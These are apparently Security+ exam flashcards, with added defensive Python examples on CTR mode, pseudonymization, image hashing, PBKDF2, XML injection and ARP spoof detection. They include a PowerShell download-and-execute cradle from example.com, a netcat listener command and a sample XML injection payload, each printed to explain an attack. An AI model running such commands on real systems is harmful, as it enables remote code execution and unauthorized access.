What is the abbreviation for anything as a service?
XaaS

Different types of embedded systems
An Arduino is a microcontroller well suited for custom development of embedded systems. They are small, inexpensive, and commonly available.

Raspberry Pi - a small single-board computer running a full OS, so it carries a bigger risk of compromise.

A custom field-programmable gate array (FPGA) will typically be more complex and expensive than an Arduino.

Repurposed desktop PC - introduces all the potential issues that a PC can include, such as a vulnerable operating system or software.

What does RAID 6 provide?
RAID 6, disk striping with dual parity, uses a minimum of four disks with distributed parity bits. It can handle up to two disks failing.

What are UAVs?
Unmanned aerial vehicles (drones)
What function does counter mode perform in a
cryptographic system?
Counter mode (CTR) makes a block cipher into a stream cipher by generating a
keystream block using a nonrepeating sequence to fill in the blocks. This allows
data to be streamed instead of waiting for blocks to be ready to send.
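The counter-mode card above is the one place in these notes where a few lines of code show more than the prose: the keystream is the encryption of nonce||counter, the same XOR both encrypts and decrypts, no padding is needed, and reusing a nonce under one key is catastrophic. The Python below is an added example, not from the original notes. It uses HMAC-SHA256 as a stand-in for the block cipher so it runs with the standard library only; real CTR mode uses AES, and the key, nonce, and messages are constructed.

```python
"""Counter (CTR) mode built on a keyed block function, plus the nonce-reuse leak (added example)."""
import hashlib
import hmac

BLOCK_BYTES = 32   # one keystream block per counter value (SHA-256 output size)


def keystream_block(key, nonce, counter):
    """Stand-in for E_k(nonce || counter). AES would be used in practice; HMAC-SHA256 keeps this dependency-free."""
    return hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def ctr_crypt(key, nonce, data):
    """Encrypt or decrypt (identical operation): XOR each chunk with the next keystream block.

    The counter never repeats within a message, and the output is exactly as long
    as the input, so the cipher behaves like a stream cipher with no padding.
    """
    out = bytearray()
    for counter, offset in enumerate(range(0, len(data), BLOCK_BYTES)):
        out += xor_bytes(data[offset:offset + BLOCK_BYTES], keystream_block(key, nonce, counter))
    return bytes(out)


def nonce_reuse_leak(ct1, ct2):
    """If two messages share key and nonce, ct1 XOR ct2 == pt1 XOR pt2: the keystream cancels out."""
    return xor_bytes(ct1, ct2)


if __name__ == "__main__":
    key = b"k" * 32                      # constructed key
    nonce = b"n" * 8                     # constructed 8-byte nonce (must be unique per message)
    pt = b"attack at dawn, bring the ledger"
    ct = ctr_crypt(key, nonce, pt)
    print(len(ct) == len(pt), ctr_crypt(key, nonce, ct) == pt)
```

The practical caveat: CTR gives confidentiality only. It does not detect tampering (flipping a ciphertext bit flips the same plaintext bit), which is why deployed modes such as GCM pair CTR with an authentication tag.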

Chris wants to limit who can use an API that his company provides and be able to log usage of the API uniquely to each organization that they provide access to. What solution is most often used to do this?
API keys

What key advantage does an elliptic curve cryptosystem have over an RSA-based cryptosystem?
It achieves the same resistance to being broken with a much smaller key length (a 256-bit ECC key is generally considered comparable to a 3072-bit RSA key).

What is a CASB used for?
A cloud access security broker (CASB) is used to monitor cloud activity and usage and to enforce security policies on users of cloud services.

Dan knows that his Linux system generates entropy that is used for multiple functions, including encryption. Which of the following is a source of entropy for the Linux kernel?
The Linux kernel uses user-driven events like keystrokes, mouse movement, and similar hardware interrupt timings to generate randomness (entropy).

Chris sets up SAN replication for his
organization. What has he done?
Storage area network (SAN) replication copies the contents of one repository to
another repository, such as an organization’s central SAN environment to a
remote SAN at the hardware or block level.

What is the best way to prevent VM escape?
The best way to prevent this is to limit the ability of the host and the VM to share resources. If possible, they should not share any resources.

AES and DES are examples of what type of cipher?
Block ciphers, which encrypt fixed-size groups of plaintext symbols all together

What is the primary threat model against static codes used for multifactor authentication?
Theft

Different types of load balancing
Least connection - takes load into consideration and sends the next request to the server with the least number of active sessions.

Weighted response time - uses health checks to determine which server responds the most quickly on an ongoing basis and then sends the traffic to that server.

Source IP hashing - uses the source and destination IP addresses to generate a hash key and then uses that key to track sessions, allowing interrupted sessions to be reallocated to the same server and thus allowing the sessions to continue.

Round robin - simply distributes requests to each server in order.



Different standards for authentication
FIDO U2F - an open standard from the FIDO (Fast IDentity Online) Alliance for hardware security keys

OTP - one-time password

OATH - the Initiative for Open Authentication, which provides the standards for both HMAC-based one-time passwords (HOTP) and time-based one-time passwords (TOTP)

SAML - Security Assertion Markup Language, an XML-based standard for exchanging authentication and authorization assertions between an identity provider and a service provider

OpenID - a federated identity standard; OpenID Connect is the identity layer built on top of OAuth 2.0

Amanda wants to allow users from other organizations to log in to her wireless network. What technology would allow her to do this using their own home organization's credentials?
RADIUS federation

Ted wants to use IP reputation information to protect his network and knows that third parties provide that information. How can he get this data, and what secure protocol is he most likely to use to retrieve it?
Many subscription services allow for data retrieval via HTTPS. Ted can subscribe to one or more threat feeds or reputation services, and then feed that information to an intrusion detection system (IDS), intrusion prevention system (IPS), next-generation firewall, or similar network security tool.

What is FDE?
Full disk encryption

What is the easiest deployment of VPN?
SSL/TLS VPN

What does AH not provide?
IPsec's Authentication Header (AH) protocol provides integrity and origin authentication for the packet but does not encrypt anything, so it provides no data confidentiality. Encapsulating Security Payload (ESP) is needed to encrypt the payload.

What will limit the amount of total bandwidth that broadcast packets can use?
Storm control

What cloud construct acts as a firewall for instances?
Security groups

John wants to deploy a solution that will provide content filtering for web applications, CASB functionality, DLP, and threat protection. What type of solution can he deploy to provide these features?
Next-generation secure web gateway

Difference between hardware, software, virtual, and cloud firewalls
A software firewall is best suited to deployments to individual machines, particularly when endpoint systems are being protected.

Hardware firewalls are typically deployed to protect network segments or groups of systems, and result in additional expense and management.

Virtual and cloud firewalls are most often deployed in datacenters where virtual or cloud environments are in use, although a virtual firewall could be run on an endpoint.

Difference between OS hardening and configuration management
OS hardening is the process of securing an operating system by patching, updating, and configuring the operating system to be secure. Configuration management is the ongoing process of managing configurations for systems.

Marcus wants to check on the status of carrier unlocking for all mobile phones owned by and deployed by his company. What method is the most effective way to do this?
Carrier unlock status needs to be checked with the carrier if you want to validate corporate-owned phones without manually checking each device.

What can a PFX file contain?
A Personal Information Exchange (PFX) file is a binary PKCS#12 container used to store a server certificate together with the intermediate certificates in its chain, and it can also contain the server's private key.

What does a P12 file contain?
A P12 file is a digital certificate bundle in the PKCS#12 (Public Key Cryptography Standard #12) format, normally password-protected. It contains both the private key and the public-key certificate, as well as information about the owner (name, email address, etc.), all certified by a third party (the CA). PFX and P12 are the same format under two file extensions.

Which wireless method works only via a line-of-sight connection?
Infrared

What is the most common way to harden the
Windows registry?
Disable remote registry access if not required.

What is the primary use of hashing in databases?
Hashing is commonly used in databases to increase the speed of indexing and retrieval, since it is typically faster to search for a hashed key than the original value stored in the database.

Charles is a CISO for an insurance company. He recently read about an attack wherein an attacker was able to enumerate all the network devices in an organization. All this was done by sending queries using a single protocol. Which protocol should Charles secure to mitigate this attack?
SNMP

Samantha has used ssh-keygen to generate new SSH keys. Which SSH key should she place on the server she wants to access, and where is it typically stored on a Linux system?
Samantha should place her public key in the ~/.ssh/authorized_keys file in her home directory on the remote server. Private keys should never leave her control, and unlike many Linux configurations, per-user SSH keys are kept under ~/.ssh rather than in the /etc/ directory.

Charles has been asked to implement DNSSEC
for his organization. Which of the following
does it provide?
Integrity

Which tool allows you to retrieve file metadata?
ExifTool

Port scanning tools
Netcat
Nmap
Nessus

What key forensic technique relies on correctly set system clocks to work properly?
Timelining

What command is used to trace the route to a host on a Windows machine?
tracert

What phase of the incident response process often involves adding firewall rules and patching systems to address the incident?
Recovery

What process is used to help identify critical
systems?
BIA - A business impact analysis (BIA) helps to identify critical systems by
determining which systems will create the largest impact if they are not available

What are data classification labels for businesses? (6 of them)
Public, private, sensitive, confidential, critical, and proprietary are all commonly used data classification labels for business.

How is SLE calculated?
Single loss expectancy (SLE) is calculated as the asset value (AV) times the exposure factor (EF), which is an estimated percentage of the asset's value that will be lost if the loss occurs.

What type of malware provides administrative privileges for the workstation?
Rootkit

While investigating a malware outbreak on your company network, you discover something very odd. There is a file that has the same name as a Windows system DLL, and it even has the same API interface, but it handles input very differently, in a manner to help compromise the system, and it appears that applications have been attaching to this file, rather than the real system DLL. What best describes this?
Shimming

Where are failed authentication logins stored in
Linux?
/var/log/auth.log

What log will journalctl provide access to?
The systemd journal

What is the netstat command used for?
netstat is a command-line tool that shows network connections, listening ports, interface statistics, and other useful information about a system's network usage.

What key difference separates pseudonymization and anonymization?
Pseudonymization can allow re-identification of the data subject if additional data (the mapping or key) is available; anonymization cannot.
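The two pseudonymization cards (the "Mark Sands" example earlier and the re-identification point just above) are illustrated by the following added Python example, which is not part of the original notes. It strips direct identifiers for anonymization, replaces them with a keyed-hash token for pseudonymization, and shows that only the pseudonymized data can be linked back through the separately held mapping. The records, field names, and key are constructed.

```python
"""Anonymization vs. pseudonymization of a constructed patient table (added example)."""
import hashlib
import hmac

# Constructed records; note the repeat subject on row 3.
RECORDS = [
    {"name": "Mark Sands", "email": "mark.sands@example.com", "zip": "30301", "diagnosis": "asthma"},
    {"name": "Ana Ruiz", "email": "ana.ruiz@example.com", "zip": "30302", "diagnosis": "flu"},
    {"name": "Mark Sands", "email": "mark.sands@example.com", "zip": "30301", "diagnosis": "allergy"},
]
DIRECT_IDENTIFIERS = ("name", "email")


def strip_identifiers(record):
    return {k: v for k, v in record.items() if k not in DIRECT_IDENTIFIERS}


def anonymize(records):
    """Remove direct identifiers outright: no key or table can undo this."""
    return [strip_identifiers(r) for r in records]


def pseudonymize(records, key):
    """Replace direct identifiers with a keyed-hash token.

    The token is deterministic per subject (rows stay linkable), and the
    token -> identity mapping is returned separately so it can be stored
    under stricter access control than the working dataset.
    """
    out, mapping = [], {}
    for r in records:
        token = hmac.new(key, r["email"].encode(), hashlib.sha256).hexdigest()[:16]
        mapping[token] = {k: r[k] for k in DIRECT_IDENTIFIERS}
        out.append({"subject": token, **strip_identifiers(r)})
    return out, mapping


def reidentify(pseudo_records, mapping):
    """Reverse pseudonymization: only possible for whoever holds the mapping."""
    return [{**mapping[r["subject"]], **{k: v for k, v in r.items() if k != "subject"}}
            for r in pseudo_records]


def rows_per_subject(pseudo_records):
    """Pseudonyms preserve analytic value: you can still count visits per person."""
    counts = {}
    for r in pseudo_records:
        counts[r["subject"]] = counts.get(r["subject"], 0) + 1
    return counts


if __name__ == "__main__":
    pseudo, mapping = pseudonymize(RECORDS, b"constructed-pseudonym-key")
    print(anonymize(RECORDS)[0])
    print(pseudo[0], rows_per_subject(pseudo))
```

The keyed hash rather than a plain hash matters: a plain SHA-256 of an email address can be reversed by hashing a list of known addresses, which would make the "pseudonym" trivially re-identifiable by anyone, not just the mapping holder.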

You are responsible for setting up new accounts for your company network. What is the most important thing to keep in mind when setting up new accounts?
Least privilege

What is the NSA?
National Security Agency - among other things, it publishes configuration benchmarks and hardening guides
Elle wants to acquire the live memory (RAM)
from a machine that is currently turned on.
Which of the following tools is best suited to
acquiring the contents of the system’s
memory?
Volatility framework

What U.S. federal agency is in charge of COOP?
FEMA

Maria wants to add entries into the Linux system log so that they will be sent to her security information and event management (SIEM) device when specific scripted events occur. What Linux tool can she use to do this?
logger

What is curl used for?
To transfer data over HTTP, HTTPS, FTP, FTPS, and other protocols

Aaron wants to use a multiplatform logging tool that supports both Windows and Unix/Linux systems and many log formats. Which of the following tools should he use to ensure that his logging environment can accept and process these logs?
NXLog

Difference between HSM and TPM?
HSMs can act as a cryptographic key manager, including creating, storing, and
securely handling encryption keys and certificates. They can also act as
cryptographic accelerators, helping offload encryption functions like Transport
Layer Security (TLS) encryption.

A TPM (Trusted Platform Module) is a device used to store keys for a system but
does not offload cryptoprocessing, and it is used for keys on a specific system
rather than broader uses.

What can OAuth be used for?
OAuth (Open Authorization) is an open standard for token-based authorization on the Internet. It allows an end user's account information to be used by third-party services without exposing the user's password. It is not an authentication protocol itself; OpenID Connect layers authentication on top of it.

What is the most common format for certificates issued by certificate authorities?
PEM

What is static code analysis?
Analysis of source code without executing it. A static code analyzer can, for example, check that every memory allocation call (malloc, calloc, etc.) has a matching deallocation.

Who assigns data labels?
Data owner

What right is not part of the GDPR?
The right to anonymity
Difference between top secret, secret and
confidential
Confidential - identifiable harm to national security.

Top Secret information requires the highest degree of protection and would
cause exceptionally grave harm if exposed without authorization.

Secret information requires a substantial degree of protection and would cause serious damage if exposed.

Standard for implementing information security management systems
ISO 27001 specifies the requirements for an information security management system (ISMS); its companion ISO 27002 is the code of practice describing the controls.

You are a security administrator and advise the web development team to include a CAPTCHA on the web page where users register for an account. Which of the following controls is this referring to?
Deterrent

Mike wants to look for a common set of tools for security and risk management for his infrastructure as a service (IaaS) environment. What organization provides a vendor-neutral reference architecture that he can use to validate his design?
The Cloud Security Alliance

What are the NIST RMF's process steps? (7)
National Institute of Standards and Technology (NIST) Risk Management Framework (RMF)
1. Prepare
2. Categorize system
3. Select controls
4. Implement controls
5. Assess controls
6. Authorize system
7. Monitor controls

Which EAP-based protocol should you choose if you want to prioritize reconnection speed and don't want to deploy client certificates for authentication?
EAP-FAST

Which EAP standard requires mutual authentication?
EAP-TLS

Miles wants to ensure that his internal DNS cannot be queried by outside users. What DNS design pattern uses different internal and external DNS servers to provide potentially different DNS responses to users of those networks?
A split-horizon DNS implementation deploys distinct DNS servers for two or more environments, ensuring that those environments receive DNS information appropriate to the DNS view that their clients should receive.

What term describes a cloud system that stores, manages, and allows auditing of API keys, passwords, and certificates?
Secrets manager

Michelle wants to check for authentication
failures on a CentOS Linux–based system.
Where should she look for these event logs?
/var/log/secure

What mitigation technique is used to limit the ability of an attack to continue while keeping systems and services online?
Containment may focus on keeping systems or services online to ensure that organizations can continue to function until other options for business continuity can be implemented.

Troy wants to review metadata about an email he has received to determine what system or server the email was sent from. Where can he find this information?
Email headers contain a significant amount of metadata, including the Received: chain showing where the email was sent from.

Valerie wants to capture the pagefile from a Windows system. Where can she find the file for acquisition?
C:\pagefile.sys

What are network monitoring tools that can provide bandwidth monitoring information?
PRTG and Cacti

Nathan needs to know how many times an
event occurred and wants to check a log file for
that event. Which of the following grep
commands will tell him how many times the
event happened if each occurrence is logged
independently in the logfile.txt log file, and
uses a unique event ID: event101?
grep -c 'event101' logfile.txt

What location is commonly used for Linux swap space?
A separate partition

Jean's company is preparing for litigation with another company that they believe has caused harm to Jean's organization. What type of legal action should Jean's lawyer take to ensure that the company preserves files and information related to the legal case?
A legal hold (litigation hold), which requires the organization to preserve all relevant data and suspend normal retention and deletion for it.

How do you ensure that a forensic image matches the original disk?
Compute a cryptographic hash of both the source and the image and compare them. MD5 and SHA-1 have traditionally been used; SHA-256 is preferred today, and many tools record more than one hash.
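The hash comparison described above is simple to state but has two practical details worth seeing: the image must be hashed in a stream (drives are far larger than RAM), and a single-bit difference anywhere must change every recorded hash. The Python below is an added example, not from the original notes; the "drive" is a constructed byte string and the tamper is a constructed bit flip.

```python
"""Streamed multi-hash verification of a forensic image against its source (added example)."""
import hashlib
import io

CHUNK = 64 * 1024   # read size; keeps memory flat regardless of image size


def hash_stream(fileobj, algorithms=("md5", "sha1", "sha256")):
    """Hash a file-like object once, feeding every chunk to all requested algorithms."""
    hashers = {alg: hashlib.new(alg) for alg in algorithms}
    for chunk in iter(lambda: fileobj.read(CHUNK), b""):
        for h in hashers.values():
            h.update(chunk)
    return {alg: h.hexdigest() for alg, h in hashers.items()}


def verify_image(source_bytes, image_bytes):
    """Return {algorithm: matched?} for source vs. image; all must be True for a valid image."""
    src = hash_stream(io.BytesIO(source_bytes))
    img = hash_stream(io.BytesIO(image_bytes))
    return {alg: src[alg] == img[alg] for alg in src}


def corrupt(data, offset):
    """Flip one bit at `offset` to simulate a bad sector copy or tampering (constructed)."""
    b = bytearray(data)
    b[offset] ^= 0x01
    return bytes(b)


# Constructed 'source drive': padding, a recognizable file, more padding.
SOURCE = b"\x00" * 4096 + b"EVIDENCE.TXT contents" + b"\xff" * 4096


if __name__ == "__main__":
    print("clean copy:", verify_image(SOURCE, SOURCE))
    print("1-bit error:", verify_image(SOURCE, corrupt(SOURCE, 4100)))
```

With real media you would open the device file (for example /dev/sdb) and the image file in binary mode and pass both to hash_stream; recording the digests in the chain-of-custody notes is what lets the image's integrity be re-verified in court years later.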

What role do digital forensics most often play in counterintelligence efforts?
Digital forensics techniques are commonly used to analyze attack patterns, tools, and techniques used by advanced persistent threat (APT) actors for counterintelligence purposes.

Adam wants to use a tool to edit the contents
of a drive. What tool can be used?
WinHex

What is APT?
Advanced persistent threat

Which cloud service model provides the consumer with the infrastructure to create applications and host them?
Platform as a service - PaaS

Claire discovers the following PowerShell script. What does it do?
powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://example.com/file.ps1'))

It downloads the remote script into memory and executes it without writing it to disk: iex is Invoke-Expression, -ep Bypass (-ExecutionPolicy Bypass) skips the execution policy check, -nop (-NoProfile) avoids loading profile scripts, and -noexit keeps the session open afterwards.

What does Kerberos use to issue tickets?
Key distribution center (KDC)

What type of topology does an ad hoc wireless network use?
Point to point

What is SoC technology?
System on a chip

Alaina has been told that her organization uses a SAN certificate in their environment. What does this tell Alaina about the certificate in use in her organization?
A SAN, or Subject Alternative Name, certificate allows multiple hostnames to be protected by the same certificate.

Frank is a security administrator for a large company. Occasionally, a user needs to access a specific resource that they don't have permission to access. Which access control methodology would be most helpful in this situation?
Rule-based access control applies a set of rules to an access request. Based on the application of the rules, the user may be given access to a specific resource that they were not explicitly granted permission to.

What browser feature is used to help prevent successful URL redirection attacks?
Displaying the full real URL

What is prepending?
Adding an expression or phrase to an email, subject line, or headers to either protect or fool users.

The term can also be used when adding data as part of an attack, and social engineers may "prepend" information by inserting it into a conversation to get targets to think about things the attacker wants them to.

What type of attack depends on the attacker
entering JavaScript into a text area that is
intended for users to enter text that will be
viewed by other users?
Cross-site scripting involves entering a script into text areas that other users will
view.

What is spam delivered over instant messaging called?
SPIM

How is risk created? A combination of what?
A risk results from the combination of a threat and a vulnerability.

What won't protect from zero-day attacks?
Patching (no patch exists yet for a zero-day)

What is PGP?
Pretty Good Privacy (PGP) is an encryption program that provides cryptographic
privacy and authentication for data communication.

PGP is a public-key cryptosystem and relies on an asymmetric algorithm

Which analysis framework makes no allowance


for an adversary retreat in its analysis?
Lockheed Martin cyber kill chain

What does netcat -l -p do?
-l puts netcat in listen mode (it waits for an inbound connection)
-p sets the local port to listen on, e.g. nc -l -p 4444
What is FISMA?
The Federal Information Security Management Act (FISMA) is a United States
federal law that defines a comprehensive framework to protect government
information, operations, and assets against natural or human-made threats.

What is HIPAA?
The Health Insurance Portability and Accountability Act (HIPAA) is a United States
federal law designed to provide privacy standards to protect patients' medical
records and other health information provided to health plans, doctors, hospitals,
and other health care providers.

What is COPPA?
The Children's Online Privacy Protection Act (COPPA) is a United States federal
law that imposes certain requirements on operators of websites or online
services directed to children under 13 years of age and on operators of other
websites or online services that have actual knowledge that they are collecting
personal information online from a child under 13 years of age.

What is data owner responsible for?


A data owner is responsible for the confidentiality, integrity, availability, and
privacy of information assets. They are usually senior executives and somebody
with authority and responsibility. A data owner is responsible for labeling the
asset and ensuring that it is protected with appropriate controls.

What is the data steward responsible for?
The data steward is primarily responsible for data quality. This involves ensuring
data is labeled and identified with appropriate metadata, and that data is
collected and stored in a format and with values that comply with applicable laws
and regulations.
What is data custodian?
The data custodian is the role that handles managing the system on which the
data assets are stored. This includes responsibility for enforcing access control,
encryption, and backup/recovery measures.

What is the privacy officer responsible for?
The privacy officer is responsible for oversight of any PII/SPI/PHI assets managed
by the company.

What is the difference between IdP and RP?
Relying parties (RPs) provide services to members of a federation. An identity
provider (IdP) provides identities, makes assertions about those identities, and
releases information about the identity holders.

What is NAC used for?
Network Access Control (NAC) uses a set of protocols to define and implement a
policy that describes how to secure access to network nodes whenever a device
initially attempts to access the network. NAC can utilize an automatic
remediation process by fixing non-compliant hosts before allowing network
access. NAC can control access to a network with policies, including
pre-admission endpoint security policy checks and post-admission controls over
where users and devices can go on a network and what they can do.

What can we implement for secure NTP traffic between Linux systems?
SSH tunneling (the exam answer). Caveat: NTP runs over UDP/123 and SSH port
forwarding only carries TCP, so in practice you would use Network Time Security
(NTS, RFC 8915) or an IPsec/VPN tunnel between the hosts.

What is the best way to secure an application on the web with a strong authentication method?
Authenticate the client with a digital certificate
What two connection methods are used for
most geofencing applications?
GPS and WI-FI

What sends unexpected and out-of-range data to applications to see how they will respond?
fuzzer

Which network protocol will suffer from failing NTP?
Kerberos. Its tickets and authenticators are time-stamped, and the KDC rejects
requests whose clock differs from its own by more than the allowed skew (5 minutes
by default), so hosts with drifting clocks cannot authenticate.

How can we secure peripherals?
Turn off remote access (SSH, Telnet)

Which algorithms are used for key stretching?
bcrypt, scrypt and PBKDF2 (Argon2 is the newer alternative)
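The following is an added example, not code from the original notes, showing what key stretching looks like in practice with PBKDF2-HMAC-SHA256 from the Python standard library. The parameters (a 16-byte random salt, a 32-byte output and 600,000 iterations) are assumptions for the example; the stored record embeds them so the work factor can be raised later without breaking old records.

```python
import hashlib
import hmac
import os
from typing import Optional

# Parameters assumed for this example: PBKDF2-HMAC-SHA256, a 16-byte random salt,
# 32-byte output, and 600,000 iterations (OWASP's current guidance for PBKDF2-SHA256).
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000
SALT_BYTES = 16
KEY_LEN = 32


def hash_password(password: str, iterations: int = ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Stretch a password with PBKDF2 and return a self-describing record.

    The record carries the algorithm, iteration count and salt, so the work
    factor can be raised later without invalidating older records.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             iterations, dklen=KEY_LEN)
    return f"{ALGORITHM}${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the key from the stored parameters; compare in constant time."""
    algorithm, iterations, salt_hex, dk_hex = record.split("$")
    if algorithm != ALGORITHM:
        raise ValueError(f"unsupported record type: {algorithm}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations),
                                    dklen=KEY_LEN)
    return hmac.compare_digest(candidate, bytes.fromhex(dk_hex))


def needs_rehash(record: str, minimum_iterations: int = ITERATIONS) -> bool:
    """True when the record was made with a weaker work factor than now required;
    call after a successful login and re-hash with the current parameters."""
    return int(record.split("$")[1]) < minimum_iterations


if __name__ == "__main__":
    rec = hash_password("correct horse battery staple")
    print(rec)
    print(verify_password("correct horse battery staple", rec))   # True
    print(verify_password("Tr0ub4dor&3", rec))                    # False
```

Two things worth noticing: the same password yields a different record every time because of the random salt, and the comparison uses hmac.compare_digest so a wrong guess takes the same time as a near miss.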

What is the recommendation for geographical dispersal of data centers?
60-120 miles
Chris is reviewing the rights that staff in his organization have to data
stored in a group of departmental file shares. He is concerned that rights
management practices have not been followed and that employees who have been
with the company he works for have not had their privileges removed after they
switched jobs. What type of issue has Chris encountered?
privilege creep

What type of attack is the U.S. Trusted Foundry program intended to help prevent?
supply chain attacks

What type of attack takes advantage of URL parameters and cookies to make
legitimate users perform unwanted actions?
Cross-site request forgery (CSRF): the victim's browser sends its cookies
automatically, so a request forged by the attacker is executed with the
victim's session.

What is port 8080 used for?
Alternate HTTP port, commonly used by web servers and proxies

What is XML injection used for?
The injection of unintended XML content and/or structures into an XML message
can alter an application's intended logic, and XML injection can cause the
insertion of malicious content into resulting messages/documents.

How can you identify an XML injection attack?
Look for XML metacharacters such as < and > (and & or CDATA markers) inside
user-supplied values that end up in an XML document.
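An added example, not part of the original notes, showing how the injection described above works and how it is prevented. It builds a small user record two ways: by string concatenation (vulnerable) and through ElementTree, which escapes the metacharacters. The attacker input, the element names and the looks_like_xml_injection pre-filter are all constructed for this example.

```python
import xml.etree.ElementTree as ET

# Constructed attacker input (not from the notes). It closes the <name> element the
# application opened, supplies its own <role>admin</role>, closes <user>, and opens a
# throwaway second user so that the application's own <role>user</role> lands there.
INJECTED_NAME = "alice</name><role>admin</role></user><user><name>dummy"


def build_user_xml_unsafe(name: str, role: str = "user") -> str:
    """Vulnerable: user input is concatenated straight into the XML markup."""
    return f"<users><user><name>{name}</name><role>{role}</role></user></users>"


def build_user_xml_safe(name: str, role: str = "user") -> str:
    """Hardened: build the tree with the XML library, which serialises < > & in text
    nodes as entities, so input can never change the document structure."""
    users = ET.Element("users")
    user = ET.SubElement(users, "user")
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "role").text = role
    return ET.tostring(users, encoding="unicode")


def roles(xml_doc: str) -> dict:
    """What a downstream consumer would believe: a name -> role map from the document."""
    root = ET.fromstring(xml_doc)
    return {u.findtext("name"): u.findtext("role") for u in root.findall("user")}


def looks_like_xml_injection(value: str) -> bool:
    """Cheap detection pre-filter on a single input field: flag the characters that
    carry structural meaning in XML. Use it for alerting, not as the only defence."""
    return any(ch in value for ch in "<>&")


if __name__ == "__main__":
    print(roles(build_user_xml_unsafe(INJECTED_NAME)))   # alice is now admin
    print(roles(build_user_xml_safe(INJECTED_NAME)))     # one user, role "user"
```

With the unsafe builder the parsed document contains two users and alice has the admin role; with the safe builder there is exactly one user whose (ugly) name is the whole injected string and whose role is still "user".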
What is ARP poisoning?
ARP poisoning, also known as ARP spoofing, is an attack carried out over a Local
Area Network (LAN) that involves sending forged ARP replies so that victims (a
host, the default gateway, or both) update the IP-to-MAC pairings in their ARP
tables to point at the attacker's MAC address, letting the attacker intercept or
modify traffic.
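An added example, not from the original notes, of how the poisoning described above is detected on the wire: replay a stream of ARP replies against a cache and alert when an IP address changes MAC or when one MAC claims several addresses. The reply stream, the addresses and the optional static pinning are constructed for the example.

```python
from collections import defaultdict

# Constructed ARP reply stream (sender IP, sender MAC), not captured traffic.
# 10.0.0.1 is the gateway; aa:bb:cc:dd:ee:ff is the attacker's NIC.
SAMPLE_REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:55"),
    ("10.0.0.7", "00:11:22:33:44:77"),
    ("10.0.0.9", "aa:bb:cc:dd:ee:ff"),   # attacker's own, legitimate address
    ("10.0.0.1", "aa:bb:cc:dd:ee:ff"),   # forged reply claiming the gateway
    ("10.0.0.7", "aa:bb:cc:dd:ee:ff"),   # and the victim, for a full man-in-the-middle
    ("10.0.0.1", "00:11:22:33:44:55"),   # real gateway answers again (flapping)
]


def detect_arp_spoof(replies, static_entries=None):
    """Replay ARP replies against a cache and report two poisoning symptoms:
    an IP whose MAC changes (worst when it is the gateway) and one MAC that
    claims several IPs. static_entries pins IP -> MAC for hosts that must not
    move; pinned entries are never overwritten, so every forged reply alerts."""
    pinned = {ip: mac.lower() for ip, mac in (static_entries or {}).items()}
    cache = dict(pinned)
    ips_per_mac = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        if ip in cache and cache[ip] != mac:
            alerts.append(f"{ip} moved from {cache[ip]} to {mac}")
        if ip not in pinned:
            cache[ip] = mac
        ips_per_mac[mac].add(ip)
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES):
        print(alert)
    print("--- with the gateway pinned ---")
    for alert in detect_arp_spoof(SAMPLE_REPLIES, {"10.0.0.1": "00:11:22:33:44:55"}):
        print(alert)
```

Pinning the gateway is the same idea as a static ARP entry on the host: the cache no longer follows the attacker's reply, and the flapping back to the real MAC stops producing noise.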

What attack technique will reveal the version of SSH running on the web server?
Banner grabbing

What type of cryptographic algorithm is ECC?
asymmetric algorithm

What is used in forensic analysis to prevent changing the hard drive contents during your analysis?
hardware write blocker

Which authentication mechanism does 802.1X usually rely upon?
EAP (carried to a RADIUS server for the actual authentication)

What is the best way to protect cookies?
Setting the Secure attribute on the cookie, so it is only sent over HTTPS
(HttpOnly and SameSite are the usual companions: the first keeps scripts from
reading it, the second limits cross-site sending).

What port is used by MySQL?
3306
What common vulnerability is usually used
against a Windows file server to expose
sensitive files, databases, and passwords?
Missing patches

What can be implemented to reduce the amount of NetFlow data collected to only
include useful traffic?
Enable sampling of the data

What is SCCM?
The Microsoft System Center Configuration Manager (SCCM) provides remote
control, patch management, software distribution, operating system deployment,
network access protection, and hardware and software inventory.

What do data retention policies include?
Data retention policies highlight what types of information an organization will
maintain and the length of time they will maintain it.

Data classification would not be covered.

Charles wants to display information from his organization's risk register in
an easy-to-understand and -rank format. What common tool is used to help
management quickly understand relative rankings of risk?
heat map

What is the role of IKE in IPsec?
Internet Key Exchange (IKE) is used to set up security associations (SAs) on each
end of the tunnel. The security associations hold all the settings (cryptographic
algorithms, hashes, keys) for the tunnel.

What is VDI?
Virtual desktop infrastructure (VDI) - we can manage patches, configurations and
software installation from central location.

Which IPsec mode allows different policies per port?
IPsec transport mode allows different policies per port

Tom is responsible for VPN connections in his company. His company uses IPsec
for VPNs. What is the primary purpose of AH in IPsec?
Authentication Header (AH) provides packet integrity and authentication of the
packet and its header; it does not encrypt, so confidentiality requires ESP.

What is hardening?
Hardening is the process of improving the security of an operating system or
application. One of the primary methods of hardening a trusted OS is to
eliminate unneeded protocols. This is also known as creating a secure baseline
that allows the OS to run safely and securely

XML-based open standard for exchanging authentication information
Security Assertion Markup Language (SAML) is an XML-based, open standard
format for exchanging authentication and authorization data between parties.
Which term is used to measure how maintainable a system or device is?
MTTR (mean time to repair)

What term is used to describe the reliability of hard drives?
Mean time between failures (MTBF) is a measurement that shows how reliable a
hardware component is.

Difference between prepending and pretexting?
Pretexting is a type of social engineering that involves using a false motive and
lying to obtain information.

Prepending is described by CompTIA as adding an expression or a phrase to an
email, subject line, or headers to either protect or fool users.

Chris is notified that one of his staff was warned via a text message that the
FBI is aware that they have accessed illegal websites. What type of issue is this?
Hoaxes are fake security threats and can consume both time and resources to
combat.

